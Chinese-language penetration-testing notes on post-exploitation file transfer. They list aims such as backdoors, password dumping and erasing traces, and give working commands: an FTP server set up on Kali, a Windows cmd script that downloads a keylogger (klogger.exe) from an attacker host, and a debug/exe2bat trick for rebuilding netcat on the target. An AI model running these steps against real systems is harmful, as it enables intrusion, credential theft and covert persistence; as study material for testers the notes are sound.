后渗透——文件传输
上传工具
提权
擦除攻击痕迹
安装后门
- 长期控制
- Dump密码
- 内网渗透
后漏洞利用阶段
- 最大挑战——防病毒软件
- 使用合法的远程控制软件
上传/下载文件
- 持久控制
- 扩大对目标系统的控制能力
Linux系统
- netcat
- curl
- wget
Windows
缺少预装的下载工具
非交互式Shell
- 类nc远程控制shell,无法与子命令交互
- ftp 192.168.1.1
使用TFTP传输文件
XP、2003默认安装,其它需要单独添加
经常被便捷防火墙过滤
Kali
1
2
3
4mkdir /tftp
cd /usr/share/windows-binaries
ls
cp /usr/share/windows-binaries/whoami.exe /tftp
使用FTP传输文件
先在kali安装pure-ftpd
1
2
3
4
5
6
7
8
9
10apt-get install pure-ftpd
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd pyrrhax -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart在windows使用cmd上下载文件
1
2
3
4
5
6
7
8echo open 192.168.0.112 21>ftp.txt
echo pyrrhax>>ftp.txt
echo password>>ftp.txt
echo bin>>ftp.txt
echo GET whoami.exe>>ftp.txt
echo GET klogger.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt使用PowerShell下载文件
使用DEBUG传输文件
- 汇编、反汇编
- 16进制dump工具
- 64k字节
- 过程:
- upx压缩文件
- wine exe2bat.exe nc.exe nc.hex
- debug<nc.hex
- copy 1.dll nc.exe
其它
- plink.exe 命令行ssh连接工具
- radmin.exe远程控制工具
- sbd 类nc 程序
- 可执行文件压缩工具upx
- 可执行程序转文本
wine /usr/share/windows-binaries/exe2bat.exe xxxx.exe xxx.txt